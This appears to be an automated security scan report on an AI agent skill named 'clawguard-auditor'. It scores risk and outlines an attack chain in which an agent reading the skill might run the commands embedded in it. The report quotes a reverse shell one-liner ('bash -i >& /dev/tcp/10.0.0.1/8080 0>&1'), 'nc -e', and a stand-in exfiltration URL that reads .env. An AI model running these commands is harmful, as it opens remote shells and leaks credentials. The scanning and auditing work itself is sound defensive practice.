Security Decision Report

clawguard-auditor

Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.

Install decision first · Source: manual upload · Scan time: 2026/4/3
Files 3
IOC 3
Privilege overreach items 0
Findings 4
Most direct threat evidence
01
Skill masquerades as legitimate security auditor · Initial entry · SKILL.md
02
Documentation embeds reverse shell patterns as 'detection examples' weaponization · SKILL.md
03
AI agent extracts and interprets embedded patterns during skill processing exploitation · SKILL.md

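Why this conclusion was reached

2/4 dimensions triggered
Pass
Declared vs. actual capabilities

Declared resources are broadly consistent with inferred capabilities.

Block
Hidden execution and outbound connections

Extracted 2 high-risk IOCs or outbound-connection signals.

Block
Attack chain and high-risk findings

The report contains a 4-step attack chain, plus 1 high-risk or critical finding.

Review
Dependency and supply-chain hygiene

Complete dependency information is not available, so the supply-chain assessment should be treated as provisional.

Attack chain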

01
Skill masquerades as legitimate security auditor

Initial entry · SKILL.md:1

02
Documentation embeds reverse shell patterns as 'detection examples'

weaponization · SKILL.md:55

03
AI agent extracts and interprets embedded patterns during skill processing

exploitation · SKILL.md:55

04
Potential execution of nc -e /dev/tcp or bash reverse shell commands

Final impact · SKILL.md:55

How the risk score was raised

Embedded reverse shell patterns +20

SKILL.md:55 contains 'nc -e' and 'bash -i >& /dev/tcp' strings embedded in documentation

Data exfiltration example URL +10

SKILL.md:99 contains 'http://evil.com/?data=$(cat .env)' as detection example

Capabilities mismatch +8

Skill describes extensive capabilities (WRITE, ADMIN, NET_EGRESS) for documentation-only implementation

No executable files +-5

Absence of scripts/ directory, requirements.txt, or any code files reduces practical risk

Benign context +-3

Patterns appear in 'SAST Red Flag Hunt' section as detection examples

Documentation artifacts +-8

All files are Markdown/JSON with no executable code present

Key evidence

High

Embedded reverse shell command patterns

SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.

SKILL.md:55
Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.
Medium

Data exfiltration pattern example

SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.

SKILL.md:99
Replace with generic description: 'URL parameter data exfiltration attempts'.
Medium

Capabilities exceed implementation

The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.

SKILL.md:25
If this is documentation-only, declare NONE for all resource levels.
Low

Documentation-only implementation

All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.

SKILL.md:1
Verify if actual implementation files exist or are expected.

Declared vs. actual capabilities

Filesystem · Pass
Declared WRITE
Inferred NONE
SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it
Network access · Pass
Declared READ
Inferred NONE
SKILL.md describes NET_EGRESS token but no network code present
Command execution · Pass
Declared ADMIN
Inferred NONE
No shell scripts or subprocess calls in any file
Environment variables · Pass
Declared READ
Inferred NONE
Mentions credential access but no code implements it

Suspicious artifacts and outbound connections

Critical · Dangerous command
nc -e

SKILL.md:55

Critical · Dangerous command
bash -i >&

SKILL.md:55

Medium · External URL
http://evil.com/?data=$(cat

SKILL.md:99

Dependencies and supply chain

No structured dependency alerts.

File composition

3 files · 271 lines
Markdown 2 files · 263 lines · JSON 1 file · 8 lines
Files needing attention · 1
SKILL.md Markdown · 149 lines
Embedded reverse shell command patterns · Data exfiltration pattern example · Capabilities exceed implementation · Documentation-only implementation · nc -e · bash -i >& · http://evil.com/?data=$(cat
Other files · README.md · _meta.json

Security highlights

No executable scripts or binary files present
No actual network connections or data exfiltration attempted
No credential harvesting code implemented
No base64-encoded payloads or obfuscated code
Patterns appear in documented 'detection examples' context rather than as instructions